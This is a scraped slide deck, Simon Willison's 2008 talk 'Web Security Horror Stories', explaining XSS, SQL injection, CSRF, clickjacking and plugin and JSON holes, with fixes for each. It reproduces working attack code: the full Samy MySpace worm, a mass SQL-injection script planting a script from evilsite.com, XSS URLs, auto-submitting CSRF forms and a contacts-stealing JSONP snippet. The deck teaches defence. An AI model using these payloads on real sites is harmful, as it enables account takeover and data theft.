SlideShare a Scribd company logo
Web Security
 Horror Stories
The Dire
        ctor’s C
                ut

Simon Willison, 26th October 2008
The edited version
• On Friday, I spent 15 minutes introducing:
 • XSS
 • CSRF / login CSRF
 • SQL injection
 • Clickjacking
• I promised this talk would provide fixes
XSS

• Cross-site scripting
  • Attacker injects JavaScript code in to your
    site
• Amazingly common
• A single XSS hole on your domain
  compromises your security, entirely
Alex Russell:

    If you are subject to an XSS,
       the same domain policy
     already ensures that you’re
       f’d. An XSS attack is the
      “root” or “ring 0” attack of
               the web.

http://www.sitepen.com/blog/2007/01/07/when-vendors-attack-film-at-11/
The same origin policy
       “The same origin policy prevents a
     document or script loaded from one
    origin from getting or setting properties
      of a document from another origin.
     This policy dates all the way back to
            Netscape Navigator 2.0.”

https://developer.mozilla.org/en/Same_origin_policy_for_JavaScript
Why?
• Without the same origin policy, I could load
  your site in a frame, iframe or popup window
  from my site...
 • ... and steal data from it
 • ... or rewrite it with my own modifications
• evil.hax.ru should not be able to read
  secret-wiki.bigco.intl
• XMLHttpRequest has the same policy
Things I can do if you
   have an XSS hole
• Steal your users’ cookies and log in as them
• Show a fake phishing login page on your site
• Embed malware and drive-by downloads
• Perform any action as if I was your user
Two categories of XSS
• Reflected
 • I embed my JS in a link to your site and
    trick your user in to following it
• Persistent
 • I get my XSS in to your site’s database
    somehow so that it shows up on your pages
http://www.facebook.com/srch.php?nm=xss%00<script>alert('XSS')</script>


   http://www.youtube.com/edit_playlist_info?p='%22%3E%3Cscript%
                     20src=http://ckers.org/s%3E


 http://groups.google.com/group/rec.sport.pro-wrestling/browse_thread/
                     thread/1ab38554971acfc9')&+eval
                 (alert(document.cookie))&+eval('?tvc=2


             http://search.live.com/images/results.aspx?
  q=1&first=21&FORM=PEIRquot;><script>alert('securitylab.ru')</script>


                     All from http://xssed.com/
Web Security Horror Stories
SQL injection
Inexcusable.
Use paramaterised
queries, or an ORM
If you’re gluing SQL
strings together with
   string appends,
• Wrong:
 • $sql = quot;select * from users where
    username = 'quot; . $username . quot;'quot;;

• Right:
 • $results = db_query(quot;select * from
    users where username = ?quot;,
    $username);
Mass XSS via SQL injection
DECLARE @T varchar(255), @C varchar(255);
DECLARE Table_Cursor CURSOR FOR
SELECT a.name, b.name
FROM sysobjects a, syscolumns b
WHERE a.id = b.id AND a.xtype = 'u' AND
  (b.xtype = 99 OR b.xtype = 35 OR b.xtype = 231 OR b.xtype = 167);
OPEN Table_Cursor;
FETCH NEXT FROM Table_Cursor INTO @T, @C;
WHILE (@@FETCH_STATUS = 0) BEGIN
  EXEC(
     'update [' + @T + '] set [' + @C + '] =
         rtrim(convert(varchar,[' + @C + ']))+
         ''<script src=http://evilsite.com/1.js></script>'''
  );
  FETCH NEXT FROM Table_Cursor INTO @T, @C;
END;
CLOSE Table_Cursor;
DEALLOCATE Table_Cursor;

                     http://hackademix.net/2008/04/26/mass-attack-faq/
Preventing XSS
• Use a tool that escapes everything on output
• Only unescape stuff that you know is safe
  and you know contains markup you want to
  execute
• IE 8 has an XSS filter; this is irrelevant to
  developers
• httpOnly cookies are mostly a waste of time
HTML “sanitisation”
• My users need to be able to add links
  and basic styles to their submissions
• “I’ll let them use HTML and remove
  anything nasty”
• An extremely common vector for XSS
 • MySpace
 • LiveJournal
 • Almost anyone else who tries
<div id=mycode style=quot;BACKGROUND: url('java
script:eval(document.all.mycode.expr)')quot; expr=quot;var B=String.fromCharCode(34);var A=String.fromCharCode
(39);function g(){var C;try{var D=document.body.createTextRange();C=D.htmlText}catch(e){}if(C){return C}else
{return eval('document.body.inne'+'rHTML')}}function getData(AU){M=getFromURL(AU,'friendID');L=getFromURL
(AU,'Mytoken')}function getQueryParams(){var E=document.location.search;var F=E.substring(1,E.length).split
('&');var AS=new Array();for(var O=0;O<F.length;O++){var I=F[O].split('=');AS[I[0]]=I[1]}return AS}var J;var
AS=getQueryParams();var L=AS['Mytoken'];var M=AS['friendID'];if(location.hostname=='profile.myspace.com')
{document.location='http://www.myspace.com'+location.pathname+location.search}else{if(!M){getData(g())}main()}
function getClientFID(){return findIn(g(),'up_launchIC( '+A,A)}function nothing(){}function paramsToString(AV)
{var N=new String();var O=0;for(var P in AV){if(O>0){N+='&'}var Q=escape(AV[P]);while(Q.indexOf('+')!=-1)
{Q=Q.replace('+','%2B')}while(Q.indexOf('&')!=-1){Q=Q.replace('&','%26')}N+=P+'='+Q;O++}return N}function
httpSend(BH,BI,BJ,BK){if(!J){return false}eval('J.onr'+'eadystatechange=BI');J.open(BJ,BH,true);if(BJ=='POST')
{J.setRequestHeader('Content-Type','application/x-www-form-urlencoded');J.setRequestHeader('Content-
Length',BK.length)}J.send(BK);return true}function findIn(BF,BB,BC){var R=BF.indexOf(BB)+BB.length;var
S=BF.substring(R,R+1024);return S.substring(0,S.indexOf(BC))}function getHiddenParameter(BF,BG){return findIn
(BF,'name='+B+BG+B+' value='+B,B)}function getFromURL(BF,BG){var T;if(BG=='Mytoken'){T=B}else{T='&'}var U=BG
+'=';var V=BF.indexOf(U)+U.length;var W=BF.substring(V,V+1024);var X=W.indexOf(T);var Y=W.substring
(0,X);return Y}function getXMLObj(){var Z=false;if(window.XMLHttpRequest){try{Z=new XMLHttpRequest()}catch(e)
{Z=false}}else if(window.ActiveXObject){try{Z=new ActiveXObject('Msxml2.XMLHTTP')}catch(e){try{Z=new
ActiveXObject('Microsoft.XMLHTTP')}catch(e){Z=false}}}return Z}var AA=g();var AB=AA.indexOf('m'+'ycode');var
AC=AA.substring(AB,AB+4096);var AD=AC.indexOf('D'+'IV');var AE=AC.substring(0,AD);var AF;if(AE){AE=AE.replace
('jav'+'a',A+'jav'+'a');AE=AE.replace('exp'+'r)','exp'+'r)'+A);AF=' but most of all, samy is my hero. <d'+'iv
id='+AE+'D'+'IV>'}var AG;function getHome(){if(J.readyState!=4){return}var AU=J.responseText;AG=findIn
(AU,'P'+'rofileHeroes','</td>');AG=AG.substring(61,AG.length);if(AG.indexOf('samy')==-1){if(AF){AG+=AF;var
AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['interestLabel']='heroes';AS['submit']='Preview';AS
['interest']=AG;J=getXMLObj();httpSend('/index.cfm?
fuseaction=profile.previewInterests&Mytoken='+AR,postHero,'POST',paramsToString(AS))}}}function postHero(){if
(J.readyState!=4){return}var AU=J.responseText;var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS
['interestLabel']='heroes';AS['submit']='Submit';AS['interest']=AG;AS['hash']=getHiddenParameter
(AU,'hash');httpSend('/index.cfm?
fuseaction=profile.processInterests&Mytoken='+AR,nothing,'POST',paramsToString(AS))}function main(){var
AN=getClientFID();var BH='/index.cfm?fuseaction=user.viewProfile&friendID='+AN+'&Mytoken='+L;J=getXMLObj
();httpSend(BH,getHome,'GET');xmlhttp2=getXMLObj();httpSend2('/index.cfm?
fuseaction=invite.addfriend_verify&friendID=11851658&Mytoken='+L,processxForm,'GET')}function processxForm()
{if(xmlhttp2.readyState!=4){return}var AU=xmlhttp2.responseText;var AQ=getHiddenParameter(AU,'hashcode');var
AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['hashcode']=AQ;AS['friendID']='11851658';AS['submit']='Add
to Friends';httpSend2('/index.cfm?
fuseaction=invite.addFriendsProcess&Mytoken='+AR,nothing,'POST',paramsToString(AS))}function httpSend2
(BH,BI,BJ,BK){if(!xmlhttp2){return false}eval('xmlhttp2.onr'+'eadystatechange=BI');xmlhttp2.open
(BJ,BH,true);if(BJ=='POST'){xmlhttp2.setRequestHeader('Content-Type','application/x-www-form-
urlencoded');xmlhttp2.setRequestHeader('Content-Length',BK.length)}xmlhttp2.send(BK);return true}quot;></DIV>
samy is my hero
  http://namb.la/popular/
A social network worm

• XSS hole in MySpace’s HTML filter
• When you viewed Samy’s profile...
 • JS makes you add him as a friend
 • JS uses XMLHttpRequest to add his
   exploit to YOUR profile as well
20 hours, 1,005,831
  friend requests
    (then MySpace crashed)
<div id=mycode style=quot;BACKGROUND: url('java
script:eval(document.all.mycode.expr)')quot; expr=quot;var B=String.fromCharCode(34);var A=String.fromCharCode
(39);function g(){var C;try{var D=document.body.createTextRange();C=D.htmlText}catch(e){}if(C){return C}else
{return eval('document.body.inne'+'rHTML')}}function getData(AU){M=getFromURL(AU,'friendID');L=getFromURL
(AU,'Mytoken')}function getQueryParams(){var E=document.location.search;var F=E.substring(1,E.length).split
('&');var AS=new Array();for(var O=0;O<F.length;O++){var I=F[O].split('=');AS[I[0]]=I[1]}return AS}var J;var
AS=getQueryParams();var L=AS['Mytoken'];var M=AS['friendID'];if(location.hostname=='profile.myspace.com')
{document.location='http://www.myspace.com'+location.pathname+location.search}else{if(!M){getData(g())}main()}
function getClientFID(){return findIn(g(),'up_launchIC( '+A,A)}function nothing(){}function paramsToString(AV)
{var N=new String();var O=0;for(var P in AV){if(O>0){N+='&'}var Q=escape(AV[P]);while(Q.indexOf('+')!=-1)
{Q=Q.replace('+','%2B')}while(Q.indexOf('&')!=-1){Q=Q.replace('&','%26')}N+=P+'='+Q;O++}return N}function
httpSend(BH,BI,BJ,BK){if(!J){return false}eval('J.onr'+'eadystatechange=BI');J.open(BJ,BH,true);if(BJ=='POST')
{J.setRequestHeader('Content-Type','application/x-www-form-urlencoded');J.setRequestHeader('Content-
Length',BK.length)}J.send(BK);return true}function findIn(BF,BB,BC){var R=BF.indexOf(BB)+BB.length;var
S=BF.substring(R,R+1024);return S.substring(0,S.indexOf(BC))}function getHiddenParameter(BF,BG){return findIn
(BF,'name='+B+BG+B+' value='+B,B)}function getFromURL(BF,BG){var T;if(BG=='Mytoken'){T=B}else{T='&'}var U=BG
+'=';var V=BF.indexOf(U)+U.length;var W=BF.substring(V,V+1024);var X=W.indexOf(T);var Y=W.substring
(0,X);return Y}function getXMLObj(){var Z=false;if(window.XMLHttpRequest){try{Z=new XMLHttpRequest()}catch(e)
{Z=false}}else if(window.ActiveXObject){try{Z=new ActiveXObject('Msxml2.XMLHTTP')}catch(e){try{Z=new
ActiveXObject('Microsoft.XMLHTTP')}catch(e){Z=false}}}return Z}var AA=g();var AB=AA.indexOf('m'+'ycode');var
AC=AA.substring(AB,AB+4096);var AD=AC.indexOf('D'+'IV');var AE=AC.substring(0,AD);var AF;if(AE){AE=AE.replace
('jav'+'a',A+'jav'+'a');AE=AE.replace('exp'+'r)','exp'+'r)'+A);AF=' but most of all, samy is my hero. <d'+'iv
id='+AE+'D'+'IV>'}var AG;function getHome(){if(J.readyState!=4){return}var AU=J.responseText;AG=findIn
(AU,'P'+'rofileHeroes','</td>');AG=AG.substring(61,AG.length);if(AG.indexOf('samy')==-1){if(AF){AG+=AF;var
AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['interestLabel']='heroes';AS['submit']='Preview';AS
['interest']=AG;J=getXMLObj();httpSend('/index.cfm?
fuseaction=profile.previewInterests&Mytoken='+AR,postHero,'POST',paramsToString(AS))}}}function postHero(){if
(J.readyState!=4){return}var AU=J.responseText;var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS
['interestLabel']='heroes';AS['submit']='Submit';AS['interest']=AG;AS['hash']=getHiddenParameter
(AU,'hash');httpSend('/index.cfm?
fuseaction=profile.processInterests&Mytoken='+AR,nothing,'POST',paramsToString(AS))}function main(){var
AN=getClientFID();var BH='/index.cfm?fuseaction=user.viewProfile&friendID='+AN+'&Mytoken='+L;J=getXMLObj
();httpSend(BH,getHome,'GET');xmlhttp2=getXMLObj();httpSend2('/index.cfm?
fuseaction=invite.addfriend_verify&friendID=11851658&Mytoken='+L,processxForm,'GET')}function processxForm()
{if(xmlhttp2.readyState!=4){return}var AU=xmlhttp2.responseText;var AQ=getHiddenParameter(AU,'hashcode');var
AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['hashcode']=AQ;AS['friendID']='11851658';AS['submit']='Add
to Friends';httpSend2('/index.cfm?
fuseaction=invite.addFriendsProcess&Mytoken='+AR,nothing,'POST',paramsToString(AS))}function httpSend2
(BH,BI,BJ,BK){if(!xmlhttp2){return false}eval('xmlhttp2.onr'+'eadystatechange=BI');xmlhttp2.open
(BJ,BH,true);if(BJ=='POST'){xmlhttp2.setRequestHeader('Content-Type','application/x-www-form-
urlencoded');xmlhttp2.setRequestHeader('Content-Length',BK.length)}xmlhttp2.send(BK);return true}quot;></DIV>
<div id=mycode style=quot;BACKGROUND: url('java
script:eval(document.all.mycode.expr)')quot; expr=quot;...quot;>


      eval('document.body.inne' + 'rHTML');


eval('xmlhttp.onread' + 'ystatechange = callback');


         http://namb.la/popular/tech.html
Things to remember
• Whitelist, don’t blacklist
• You’re programming against undocumented
  parsing routines in closed-source browsers
• Distrust any library that doesn’t have a unit test
  suite a mile long
• http://ha.ckers.org/xss.html
• http://code.google.com/p/html5lib/ is promising
Google’s UTF-7 hole
The UTF-7 hole
     • Google’s 404 pages used to be served
        without a character set specified in the
        HTTP headers or <head> section
     • Without those hints, IE inspects the first
        4096 bytes to “guess” which encoding
        is used
     • XSS attacks encoded as UTF-7 were
        shown on the page and executed by IE

http://shiflett.org/blog/2005/dec/googles-xss-vulnerability
You can’t trust CSS either
   • Want to let your users include their own
      stylesheet?
   • HTC in IE and XBL in Mozilla are both
      vectors for JavaScript attacks
     • LiveJournal were attacked with this
   • A “position: absolute” hack was used to
      steal 30,000 MySpace passwords last year

      http://community.livejournal.com/lj_dev/708069.html
http://www.securiteam.com/securitynews/6O00M0AHFW.html
CSRF
Bill Zeller:

“We’ve found CSRF vulnerabilities in
 sites that have a huge incentive to
  do security correctly. If you’re in
  charge of a website and haven’t
specifically protected against CSRF,
   chances are you’re vulnerable”
The Google Web
  Accelerator
How does it work?

• It pre-fetches the links on a page in to a
  cache, so they’re already loaded when you
  click on them


• Links like http://app.example.com/
  delete.php?id=5
How does it work?

• It pre-fetches the links on a page in to a
  cache, so they’re already loaded when you
  click on them


• Links like http://app.example.com/
  delete.php?id=5
http://www.37signals.com/svn/archives2/google_web_accelerator_hey_not_so_fast_an_alert_for_web_app_designers.php
That’s also a security hole
<img src=quot;http://app.example.com/delete.php?id=1quot;>
<img src=quot;http://app.example.com/delete.php?id=2quot;>
<img src=quot;http://app.example.com/delete.php?id=3quot;>
<img src=quot;http://app.example.com/delete.php?id=4quot;>
<img src=quot;http://app.example.com/delete.php?id=5quot;>
<img src=quot;http://app.example.com/delete.php?id=6quot;>
<img src=quot;http://app.example.com/delete.php?id=7quot;>
<img src=quot;http://app.example.com/delete.php?id=8quot;>
                         ...
So use POST


• You can't create a page that
  automatically posts to another site, can
  you?
POST will not save you
<form action=quot;http://app.example.com/delete.phpquot;
 method=quot;POSTquot;>
 <input type=quot;hiddenquot; name=quot;idquot; value=quot;1quot;>
 <input type=quot;submitquot; value=quot;More kittens please!quot;>
</form>




  fofurasfelinas: http://www.flickr.com/photos/fofurasfelinas/9724483/
Or do it with JavaScript
<div style=quot;display: nonequot;>
<form action=quot;http://app.example.com/delete.phpquot;
 method=quot;POSTquot;>
 <input type=quot;hiddenquot; name=quot;idquot; value=quot;1quot;>
</form>
</div>

<script>document.forms[0].submit()</script>

Put this in a hidden iframe and your victim won't even
know it happened.
The Digg exploit


     • A few years ago, Digg had no CSRF
        protection on their “digg this” button
     • Self-digging pages!


http://ha.ckers.org/blog/20060615/a-story-that-diggs-itself/
The Gmail filter hack
http://www.gnucitizen.org/blog/google-gmail-e-mail-hijack-technique/
“We believe this is the first CSRF
   vulnerability to allow the transfer of funds
          from a financial institution.”

http://www.freedom-to-tinker.com/blog/wzeller/
popular-websites-vulnerable-cross-site-request-
                forgery-attacks
Preventing CSRF
• You need to distinguish between form
  interactions from your user on your site,
  and form interactions from your user on
  some other site
• Referrer checking is notoriously
  unreliable
• Solution: include a form token (Yahoo!
  calls this a “crumb”) proving that the
  post came from your site
Crumbs
<form action=quot;http://app.example.com/delete.phpquot;
 method=quot;POSTquot;>
 <input type=quot;hiddenquot; name=quot;idquot; value=quot;37quot;>
 <input type=quot;hiddenquot; name=quot;crumbquot;
   value=quot;856c2f50ddc49fd710f14a406ec1fef652d3c9fquot;>
 <input type=quot;submitquot; value=quot;Delete this itemquot;>
</form>
Crumbs
• Should be unique per user (or one user
  can use their crumb to attack another)
• Hence should be tied to the user’s
  session or login cookie
• Should be changed over time
• Quick and dirty: use sha1(salt + user’s
  session ID + timestamp) as the crumb
Protecting the crumb
• Your crumb is now the only thing
  protecting you from CSRF attacks
• This is why XSS is “ring 0” for the Web
• With XSS, I can steal your crumb and
  run riot across your site
• XSS holes are automatically CSRF holes
Crumbs and Ajax
• Ajax can set HTTP headers; regular forms can’t
• Ajax requests must be from the same domain
• So X-Requested-By: XMLHttpRequest can only
  come from your own site
• You can skip your crumb checking for requests
  that include that custom header
Login CSRF
• Most login forms skip CSRF protection
 • Create a throw-away PayPal account
 • Use CSRF to log someone in as “you”
 • Hope that they add their credit card or
    bank details
 • Log in later and steal all of their money!
Clickjacking


http://jeremiahgrossman.blogspot.com/2008/09/cancelled-clickjacking-owasp-appsec.html
Web Security Horror Stories
iframe
      !
Web Security Horror Stories
Web Security Horror Stories
Web Security Horror Stories
Web Security Horror Stories
Web Security Horror Stories
<style type=quot;text/cssquot;>
iframe {
  width: 400px;
  height: 200px;
  position: absolute;
  top: 10px;
  left: 10px;
  overflow: hidden;
  opacity: 0;
}
#decoy {
   ...
}
</style>

<iframe src=quot;http://veryimportantapp.com/delete-account/quot;>
</iframe>

<p id=quot;decoyquot;>Click HERE for kittens!</p>
Frame-busting
<script type=quot;text/javascriptquot;>
if (top.location != location) {
	

 top.location.href = document.location.href;
}
</script>


• Ironically, turning off JavaScript in your
  browser makes you less safe here
Web Security Horror Stories
Web Security Horror Stories
Anti click-jacki
                ng
The problem with
     plugins
crossdomain.xml
          <cross-domain-policy>
             <allow-access-from domain=quot;*quot; />
          </cross-domain-policy>

Putting this at example.com/crossdomain.xml allows Flash applets
on other sites to read your pages and steal your crumbs

Flash can even fake an X-Requested-With: XMLHttpRequest header

That’s why Flickr use api.flickr.com/crossdomain.xml instead
crossdomain.xml
          <cross-domain-policy>
             <allow-access-from domain=quot;*quot; />
          </cross-domain-policy>

Putting this at example.com/crossdomain.xml allows Flash applets
on other sites to read your pages and steal your crumbs

Flash can even fake an X-Requested-With: XMLHttpRequest header

That’s why Flickr use api.flickr.com/crossdomain.xml instead
Nasty crossdomain.xml
                tricks
 loadPolicyFile(quot;http://dom.ext/exit.php?url=http://dom.ext/upl/Xdomain.xmlquot;)


00000000   47   49   46   38   39   61   01   01-01   01   e7   e9   20   3c   63   72   GIF89a.......<cr
00000010   6f   73   73   2d   64   6f   6d   61-69   6e   2d   70   6f   6c   69   63   oss-domain-polic
00000020   79   3e   0a   20   20   3c   61   6c-6c   6f   77   2d   61   63   63   65   y>...<allow-acce
00000030   73   73   2d   66   72   6f   6d   20-64   6f   6d   61   69   6e   3d   22   ss-from domain=quot;
00000040   2a   22   2f   3e   20   0a   20   20-3c   2f   63   72   6f   73   73   2d   *quot;/>....</cross-
00000050   64   6f   6d   61   69   6e   2d   70-6f   6c   69   63   79   3e   47   49   domain-policy>..




             http://www.hardened-php.net/library/
   poking_new_holes_with_flash_crossdomain_policy_files.html
The PDF hole

    • In January 2007, an XSS hole was found
       in the Adobe PDF reader itself
    • It could execute JavaScript in the
       context of the current domain
    • Any sites hosting .pdf files for download
       were vulnerable


http://shiflett.org/blog/2007/jan/adobe-pdf-xss-vulnerability
You can’t secure your site
  100%, because there’s
always a chance a browser
or plugin will screw things
        up for you
Insecure JSON
JSONP rocks!
      • http://json-tinyurl.appspot.com/
      • http://json-time.appspot.com/
      • http://json-head.appspot.com/

http://json-tinyurl.appspot.com/?url=http://example.com/&callback=foo

  foo({quot;tinyurlquot;: quot;http://tinyurl.com/kotuquot;, quot;okquot;: true})
• JSONP lets you opt-in to sharing your
  site’s data with other sites using JavaScript

• ... so make sure it’s data you want to share
Stealing Google contacts
<script>
function google(a){
  var emails;
  for(i=1;i<a.Body.Contacts.length;i){
    alert(a.Body.Contacts[i].Email);
  }
  emails = quot;</ol>quot;
  document.write(emails);
}
</script>
<script src=quot;http://docs.google.com/data/contacts?
out=js&show=ALL&psort=Affinity&callback=google&max=99999quot;>
</script>


                                                  http://blog.adamjacobmuller.com/gmail.txt
    http://www.cyber-knowledge.net/blog/2007/01/01/gmail-vulnerable-to-contact-list-hijacking/
Jeremiah Grossman:

      “If any JSON feed containing
       user-sensitive information is
      wrapped with a call-back and
      has a predictable URL... then
            that data is at risk”


 http://jeremiahgrossman.blogspot.com/2007/01/gmail-xsrf-json-call-back-hackery.html
Regular JSON?
          • That’s not secure either
          • In old versions of Firefox, you can redefine
               the Array constructor to grab the data
          • If your JSON object is an array, the data
               can be grabbed using <script src=quot;your-
               data-herequot;>



http://directwebremoting.org/blog/joe/2007/03/05/json_is_not_as_safe_as_people_think_it_is.html
Secure JSON
   Use { } as the root, not [ ]

If you’re paranoid about future similar
 problems, use an idiom like this one:

       while (true) {
         {quot;jsonquot;: quot;goes herequot;}
       }
And if that wasn’t enough
    “More than 70% of people would reveal
   their computer password in exchange for
    a bar of chocolate, a survey has found.”

      http://news.bbc.co.uk/1/hi/technology/3639679.stm

 • We have a shared responsibility to teach people
   better online security behaviour
 • Don’t teach our users to be phished!
NoScript?
Stay informed!
•   http://planet-websecurity.org/feed/
•   http://www.owasp.org/
•   http://simonwillison.net/tags/security/
•   http://simonwillison.net/tags/csrf/
•   http://simonwillison.net/tags/xss/
•   http://simonwillison.net/tags/clickjacking/
•   http://simonwillison.net/tags/phishing/
Thank you

More Related Content

What's hot

XXE Exposed: SQLi, XSS, XXE and XEE against Web Services
XXE Exposed: SQLi, XSS, XXE and XEE against Web ServicesXXE Exposed: SQLi, XSS, XXE and XEE against Web Services
XXE Exposed: SQLi, XSS, XXE and XEE against Web Services
Abraham Aranguren
 
Havij
HavijHavij
SSRF For Bug Bounties
SSRF For Bug BountiesSSRF For Bug Bounties
SSRF For Bug Bounties
OWASP Nagpur
 
Ssrf
SsrfSsrf
OWASP Top 10 - Day 1 - A1 injection attacks
OWASP Top 10 - Day 1 - A1 injection attacksOWASP Top 10 - Day 1 - A1 injection attacks
OWASP Top 10 - Day 1 - A1 injection attacks
Mohamed Talaat
 
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourWAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
Soroush Dalili
 
Introduction to Powershell Version 5
Introduction to Powershell Version 5Introduction to Powershell Version 5
Introduction to Powershell Version 5
Nishtha Kesarwani
 
CBSecurity - Secure all Things
CBSecurity - Secure all ThingsCBSecurity - Secure all Things
CBSecurity - Secure all Things
Ortus Solutions, Corp
 
Sql injection
Sql injectionSql injection
Sql injection
Sasha-Leigh Garret
 
SSRF workshop
SSRF workshop SSRF workshop
SSRF workshop
Ivan Novikov
 
Two scoops of Django - Security Best Practices
Two scoops of Django - Security Best PracticesTwo scoops of Django - Security Best Practices
Two scoops of Django - Security Best Practices
Spin Lai
 
Owasp Top 10 A1: Injection
Owasp Top 10 A1: InjectionOwasp Top 10 A1: Injection
Owasp Top 10 A1: Injection
Michael Hendrickx
 
A New Era of SSRF - Exploiting URL Parser in Trending Programming Languages! ...
A New Era of SSRF - Exploiting URL Parser in Trending Programming Languages! ...A New Era of SSRF - Exploiting URL Parser in Trending Programming Languages! ...
A New Era of SSRF - Exploiting URL Parser in Trending Programming Languages! ...
CODE BLUE
 
XSS Magic tricks
XSS Magic tricksXSS Magic tricks
XSS Magic tricks
GarethHeyes
 
SQLMAP Tool Usage - A Heads Up
SQLMAP Tool Usage - A  Heads UpSQLMAP Tool Usage - A  Heads Up
SQLMAP Tool Usage - A Heads Up
Mindfire Solutions
 
Thick client pentesting_the-hackers_meetup_version1.0pptx
Thick client pentesting_the-hackers_meetup_version1.0pptxThick client pentesting_the-hackers_meetup_version1.0pptx
Thick client pentesting_the-hackers_meetup_version1.0pptx
Anurag Srivastava
 
LDAP
LDAPLDAP
Secure coding presentation Oct 3 2020
Secure coding presentation Oct 3 2020Secure coding presentation Oct 3 2020
Secure coding presentation Oct 3 2020
Moataz Kamel
 
I'm in your cloud... reading everyone's email. Hacking Azure AD via Active Di...
I'm in your cloud... reading everyone's email. Hacking Azure AD via Active Di...I'm in your cloud... reading everyone's email. Hacking Azure AD via Active Di...
I'm in your cloud... reading everyone's email. Hacking Azure AD via Active Di...
DirkjanMollema
 
Access Control Models: Controlling Resource Authorization
Access Control Models: Controlling Resource AuthorizationAccess Control Models: Controlling Resource Authorization
Access Control Models: Controlling Resource Authorization
Mark Niebergall
 

What's hot (20)

XXE Exposed: SQLi, XSS, XXE and XEE against Web Services
XXE Exposed: SQLi, XSS, XXE and XEE against Web ServicesXXE Exposed: SQLi, XSS, XXE and XEE against Web Services
XXE Exposed: SQLi, XSS, XXE and XEE against Web Services
 
Havij
HavijHavij
Havij
 
SSRF For Bug Bounties
SSRF For Bug BountiesSSRF For Bug Bounties
SSRF For Bug Bounties
 
Ssrf
SsrfSsrf
Ssrf
 
OWASP Top 10 - Day 1 - A1 injection attacks
OWASP Top 10 - Day 1 - A1 injection attacksOWASP Top 10 - Day 1 - A1 injection attacks
OWASP Top 10 - Day 1 - A1 injection attacks
 
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourWAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
 
Introduction to Powershell Version 5
Introduction to Powershell Version 5Introduction to Powershell Version 5
Introduction to Powershell Version 5
 
CBSecurity - Secure all Things
CBSecurity - Secure all ThingsCBSecurity - Secure all Things
CBSecurity - Secure all Things
 
Sql injection
Sql injectionSql injection
Sql injection
 
SSRF workshop
SSRF workshop SSRF workshop
SSRF workshop
 
Two scoops of Django - Security Best Practices
Two scoops of Django - Security Best PracticesTwo scoops of Django - Security Best Practices
Two scoops of Django - Security Best Practices
 
Owasp Top 10 A1: Injection
Owasp Top 10 A1: InjectionOwasp Top 10 A1: Injection
Owasp Top 10 A1: Injection
 
A New Era of SSRF - Exploiting URL Parser in Trending Programming Languages! ...
A New Era of SSRF - Exploiting URL Parser in Trending Programming Languages! ...A New Era of SSRF - Exploiting URL Parser in Trending Programming Languages! ...
A New Era of SSRF - Exploiting URL Parser in Trending Programming Languages! ...
 
XSS Magic tricks
XSS Magic tricksXSS Magic tricks
XSS Magic tricks
 
SQLMAP Tool Usage - A Heads Up
SQLMAP Tool Usage - A  Heads UpSQLMAP Tool Usage - A  Heads Up
SQLMAP Tool Usage - A Heads Up
 
Thick client pentesting_the-hackers_meetup_version1.0pptx
Thick client pentesting_the-hackers_meetup_version1.0pptxThick client pentesting_the-hackers_meetup_version1.0pptx
Thick client pentesting_the-hackers_meetup_version1.0pptx
 
LDAP
LDAPLDAP
LDAP
 
Secure coding presentation Oct 3 2020
Secure coding presentation Oct 3 2020Secure coding presentation Oct 3 2020
Secure coding presentation Oct 3 2020
 
I'm in your cloud... reading everyone's email. Hacking Azure AD via Active Di...
I'm in your cloud... reading everyone's email. Hacking Azure AD via Active Di...I'm in your cloud... reading everyone's email. Hacking Azure AD via Active Di...
I'm in your cloud... reading everyone's email. Hacking Azure AD via Active Di...
 
Access Control Models: Controlling Resource Authorization
Access Control Models: Controlling Resource AuthorizationAccess Control Models: Controlling Resource Authorization
Access Control Models: Controlling Resource Authorization
 

Similar to Web Security Horror Stories

PHPUG Presentation
PHPUG PresentationPHPUG Presentation
PHPUG Presentation
Damon Cortesi
 
Be Afraid. Be Very Afraid. Javascript security, XSS & CSRF
Be Afraid. Be Very Afraid. Javascript security, XSS & CSRFBe Afraid. Be Very Afraid. Javascript security, XSS & CSRF
Be Afraid. Be Very Afraid. Javascript security, XSS & CSRF
Mark Stanton
 
JavaScript Security
JavaScript SecurityJavaScript Security
JavaScript Security
Jason Harwig
 
W3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesW3 conf hill-html5-security-realities
W3 conf hill-html5-security-realities
Brad Hill
 
Whatever it takes - Fixing SQLIA and XSS in the process
Whatever it takes - Fixing SQLIA and XSS in the processWhatever it takes - Fixing SQLIA and XSS in the process
Whatever it takes - Fixing SQLIA and XSS in the process
guest3379bd
 
2009 Barcamp Nashville Web Security 101
2009 Barcamp Nashville   Web Security 1012009 Barcamp Nashville   Web Security 101
2009 Barcamp Nashville Web Security 101
brian_dailey
 
Securing Java EE Web Apps
Securing Java EE Web AppsSecuring Java EE Web Apps
Securing Java EE Web Apps
Frank Kim
 
Reverse Engineering Malicious Javascript
Reverse Engineering Malicious JavascriptReverse Engineering Malicious Javascript
Reverse Engineering Malicious Javascript
Yusuf Motiwala
 
PHP Secure Programming
PHP Secure ProgrammingPHP Secure Programming
PHP Secure Programming
Balavignesh Kasinathan
 
Integrity protection for third-party JavaScript
Integrity protection for third-party JavaScriptIntegrity protection for third-party JavaScript
Integrity protection for third-party JavaScript
Francois Marier
 
Web Security
Web SecurityWeb Security
Web Security
Supankar Banik
 
Ajax Security
Ajax SecurityAjax Security
Ajax Security
Joe Walker
 
Brakeman
BrakemanBrakeman
Brakeman
Romain Sempé
 
XSS - Attacks & Defense
XSS - Attacks & DefenseXSS - Attacks & Defense
XSS - Attacks & Defense
Blueinfy Solutions
 
Intro to Php Security
Intro to Php SecurityIntro to Php Security
Intro to Php Security
Dave Ross
 
2 Roads to Redemption - Thoughts on XSS and SQLIA
2 Roads to Redemption - Thoughts on XSS and SQLIA2 Roads to Redemption - Thoughts on XSS and SQLIA
